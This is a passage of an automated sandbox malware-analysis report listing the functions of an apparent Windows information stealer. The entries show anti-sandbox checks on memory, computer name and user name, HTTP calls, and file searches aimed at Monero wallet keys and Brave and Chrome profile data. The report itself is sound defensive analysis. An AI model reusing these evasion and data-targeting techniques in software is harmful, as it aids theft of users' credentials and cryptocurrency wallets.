                      • CloseHandle.KERNEL32(00000000), ref: 001D6AF9
                      • Sleep.KERNEL32(00001770), ref: 001D6B04
                      • CloseHandle.KERNEL32(?,00000000,?,00E38F10,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6B1A
                      • ExitProcess.KERNEL32 ref: 001D6B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 5e7c4082baa9063e73f45a5f2453f5ae50197617195a035fe675c7e6c4c7a726
                      • Instruction ID: 7fb685d9ee84127ecffa19bf0666dec68f0f017d93d8810926bdf130a1a6a69e
                      • Opcode Fuzzy Hash: 5e7c4082baa9063e73f45a5f2453f5ae50197617195a035fe675c7e6c4c7a726
                      • Instruction Fuzzy Hash: D6F05E30A40329AFEB00EBA0DD06BBD7B34EF14701F108927F502B22C1DBB05540D69A
                      Function 001C47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: d848d08b347225a9497ec311338d721512b4568ee7c6ac5dcdd9bb420c653a05
                      • Instruction ID: edd66646892c595c9eac4ff7dc96356dee268a44041d651a7ae58e707aab177c
                      • Opcode Fuzzy Hash: d848d08b347225a9497ec311338d721512b4568ee7c6ac5dcdd9bb420c653a05
                      • Instruction Fuzzy Hash: 5F213EB1D00209ABDF14DFA4E845ADE7B75FF45320F108626F915A7281EB706A05CB81
                      Function 001D51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C6280: InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                        • Part of subcall function 001C6280: StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C6303
                        • Part of subcall function 001C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                        • Part of subcall function 001C6280: HttpOpenRequestA.WININET(00000000,GET,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C6385
                        • Part of subcall function 001C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                        • Part of subcall function 001C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: a2af049968789feb381dd098d31c91f7b5f0f733f73922e7a4419e5c5e7805e8
                      • Instruction ID: 6b0851df024d570ee83375b9463608ad444015e55776f914caec84c7662da607
                      • Opcode Fuzzy Hash: a2af049968789feb381dd098d31c91f7b5f0f733f73922e7a4419e5c5e7805e8
                      • Instruction Fuzzy Hash: FC110030910148ABCB14FF64DD52EED7339AF70300FC04159F81A5B692EF71AB09D695
                      Function 001C1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
                      • ExitProcess.KERNEL32 ref: 001C1294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 803317263-2766056989
                      • Opcode ID: bd5aa85a939fa23bccdf5f5469f3fcfa27b1a0be3953e86d6baf9f7ff91a0cfc
                      • Instruction ID: 61040eea1f1da2640a96c8256310a6e24c66d23e82c411431326c6ee297c3a2b
                      • Opcode Fuzzy Hash: bd5aa85a939fa23bccdf5f5469f3fcfa27b1a0be3953e86d6baf9f7ff91a0cfc
                      • Instruction Fuzzy Hash: A5016DB0D80308BAEB10EBE0DC49FAEBB78AB25705F208059F705B72C1D77495418799
                      Function 001D78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: 7e1c7723826807b1fb228f38aa319878f9278e98de2c17a90a89c88d1423890a
                      • Instruction ID: 58cd965297c62804d37abc2e6c033d49b70b734a17c05f1dcf54022e3a9794b9
                      • Opcode Fuzzy Hash: 7e1c7723826807b1fb228f38aa319878f9278e98de2c17a90a89c88d1423890a
                      • Instruction Fuzzy Hash: 1D0162B2944308EBC704EF95DD45BAEBBB8F704B25F10422AE545A3380D3745904CBA1
                      Function 001C1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
                      • ExitProcess.KERNEL32 ref: 001C1143
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 219544a1f1129a3b77173bee66406dc3b07ca09323dcf3a3980a5f000786b7fe
                      • Instruction ID: 3d2d2482cb582aabc201830e5967484baf845bebe06df485a3dcb9c86b473bd2
                      • Opcode Fuzzy Hash: 219544a1f1129a3b77173bee66406dc3b07ca09323dcf3a3980a5f000786b7fe
                      • Instruction Fuzzy Hash: 6AE0E671985308FBE7106BA09D0AF097678AB15B01F104154F709761D1D7B56650969D
                      Function 001C10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001C10B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001C10F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 17a939e22e1aa02aaa94616b9ac78de7dd0bae042a0c7b231831e468c1221e73
                      • Instruction ID: 43bcbe6808e8632941de006a5b51afa8db644ba291e92c2da1c0baacd52e2f8c
                      • Opcode Fuzzy Hash: 17a939e22e1aa02aaa94616b9ac78de7dd0bae042a0c7b231831e468c1221e73
                      • Instruction Fuzzy Hash: 42F0E271681308BBE714AAA4AC59FAEB7E8E705B15F305458F504E3280D6719E00CAA5
                      Function 001C1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                        • Part of subcall function 001D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                        • Part of subcall function 001D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                        • Part of subcall function 001D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                        • Part of subcall function 001D7850: RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                        • Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                      • ExitProcess.KERNEL32 ref: 001C11C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 82e4113e2445854a60557f74b01a94a5480865b4db56b0a2769fd70d9a769aa7
                      • Instruction ID: a283d6094b48dbd68e8665895b993214926aafe130047504ce0a5bd0ed67cd1c
                      • Opcode Fuzzy Hash: 82e4113e2445854a60557f74b01a94a5480865b4db56b0a2769fd70d9a769aa7
                      • Instruction Fuzzy Hash: C4E012B595430163CA0073F4AD0AF2A329C5B35349F08083AFA05E3343FB79F810956A

                      Non-executed Functions

                      Function 001D38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 001D38CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 001D38E3
                      • lstrcat.KERNEL32(?,?), ref: 001D3935
                      • StrCmpCA.SHLWAPI(?,001E0F70), ref: 001D3947
                      • StrCmpCA.SHLWAPI(?,001E0F74), ref: 001D395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001D3C67
                      • FindClose.KERNEL32(000000FF), ref: 001D3C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 04681d7930a513cc878278ffa3becd08d73bfa5ba1f482f203e60f1c1af33b54
                      • Instruction ID: 4461e5c6d42108e221b41b9ba63afb6839398d2c24da5fb9e8171d68c0788b1a
                      • Opcode Fuzzy Hash: 04681d7930a513cc878278ffa3becd08d73bfa5ba1f482f203e60f1c1af33b54
                      • Instruction Fuzzy Hash: 77A161B2A00308ABDB24EFA4DD85FEE7378BF58300F044599E51DA6141EB759B94CF62
                      Function 001CBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,001E0B32,001E0B2B,00000000,?,?,?,001E13F4,001E0B2A), ref: 001CBEF5
                      • StrCmpCA.SHLWAPI(?,001E13F8), ref: 001CBF4D
                      • StrCmpCA.SHLWAPI(?,001E13FC), ref: 001CBF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CC7BF
                      • FindClose.KERNEL32(000000FF), ref: 001CC7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 56888f76015318d567baf60b2d4794dc4c817567173a41dc16a25481df5f16e6
                      • Instruction ID: 5d440650d9afe22269974f0b09d7325150928002ecc91e6a037a870e2ae2ee02
                      • Opcode Fuzzy Hash: 56888f76015318d567baf60b2d4794dc4c817567173a41dc16a25481df5f16e6
                      • Instruction Fuzzy Hash: 68426572910114ABCB14FB70DD96EEE737DAF64300F804569F90AA6281EF349F49CB96
                      Function 001D4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 001D492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                      • StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                      • StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                      • FindClose.KERNEL32(000000FF), ref: 001D4B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
